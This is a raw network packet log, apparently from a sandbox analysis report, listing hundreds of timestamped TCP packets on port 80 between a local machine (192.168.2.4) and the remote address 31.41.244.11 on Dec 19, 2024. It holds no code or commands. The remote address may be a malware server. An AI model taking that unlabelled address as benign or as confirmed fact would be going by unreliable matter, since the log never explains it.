                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.340666056 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.341706038 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.341768980 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.341789961 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.342179060 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.342755079 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.342916012 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.342969894 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.343882084 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.343986988 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.343993902 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.344877005 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.344959021 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.345051050 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.345141888 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.346081018 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.346153975 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.346198082 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.347182035 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.347218037 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.347237110 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.347304106 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.347563982 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.348306894 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.348377943 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.348433971 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.348571062 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.349437952 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.349553108 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.349601984 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.349601984 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.350526094 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.350646019 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.350702047 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.351661921 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.351715088 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.351753950 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.351927996 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.352762938 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.352826118 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.352891922 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.352936983 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.353872061 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.353949070 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.354013920 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.354221106 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.354975939 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.355155945 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.355169058 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.355240107 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.356091022 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.356214046 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.356270075 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.357188940 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.357249975 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.357315063 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.357837915 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.358302116 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.358413935 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.358568907 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.358654976 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.362209082 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.362245083 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.362266064 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.362282991 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.362333059 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.362333059 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.362351894 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.362421989 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.362880945 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.363024950 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.363070011 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.363185883 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.364073038 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.364170074 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.364236116 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.364306927 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.365159035 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.365195036 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.365232944 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.365288973 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.366231918 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.366308928 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.366388083 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.366543055 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.367341995 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.367377996 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.367410898 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.367435932 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.368386030 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.368475914 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.368561029 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.368621111 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.369488955 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.369570971 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.369575024 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.369642973 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.370687008 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.370722055 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.370771885 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.370837927 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.371402979 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.371438980 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.371488094 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.371488094 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.372526884 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.372648954 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.372872114 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.372970104 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.374106884 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.374146938 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.374232054 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.375197887 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.375232935 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.375334024 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.376276970 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.376472950 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.376482964 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.376533985 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.377381086 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.377415895 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.377471924 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.377471924 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.378597975 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.378634930 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.378760099 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.379699945 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.379772902 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.379853964 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.379930973 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.380809069 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.380845070 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.380969048 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.381877899 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.382080078 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.382153988 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.382962942 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.382999897 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.383021116 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.383111000 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.384016037 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.384087086 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.384167910 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.384274960 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.385076046 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.385200977 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.385416031 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.385473013 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.385709047 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.385745049 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.385801077 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.385801077 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.386137009 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.386185884 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.386225939 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.386297941 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.520792961 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.520929098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.520946026 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.521030903 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.521322012 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.521399021 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.521436930 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.521507025 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.522397995 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.522478104 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.522820950 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.522905111 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.522945881 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.522994995 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.523914099 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.524045944 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.524178028 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.525047064 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.525145054 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.525262117 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.526138067 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.526200056 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.526266098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.527286053 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.527350903 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.527406931 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.528245926 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.528378010 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.528450966 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.528511047 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.529474974 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.529560089 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.529597044 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.530617952 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.530623913 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.530682087 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.530720949 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.530916929 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.531722069 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.531826019 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.532013893 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.532828093 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.532923937 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.533018112 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.533956051 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.534024000 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.534090042 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.535118103 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.535188913 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.535235882 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.535705090 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.536181927 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.536350965 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.536490917 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.537282944 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.537372112 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.537412882 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.538094997 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.538372993 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.538463116 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.538467884 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.539477110 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.539546013 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.539618015 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.540627956 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.540628910 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.540682077 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.540688992 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.540761948 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.541712999 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.541779995 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.541850090 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.541892052 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.542804956 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.542952061 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.542973995 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.543011904 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.543934107 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.544068098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.544115067 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.545051098 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.545120955 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.545186043 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.545872927 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.546205997 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.546272039 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.546355009 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.547276020 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.547394037 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.547445059 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.548460960 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.548517942 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.548600912 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.549485922 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.549606085 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.549608946 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.550586939 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.550669909 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.550748110 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.550879002 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.551903009 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.551975965 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.552041054 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.552110910 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.552803040 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.552851915 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.552933931 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.552997112 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.553927898 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.554037094 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.554060936 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.554110050 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.555056095 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.555176020 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.555243015 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.556164980 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.556231976 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.556291103 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.556627035 CET4991080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.557277918 CET804991031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:10:10.557384968 CET804991031.41.244.11192.168.2.4
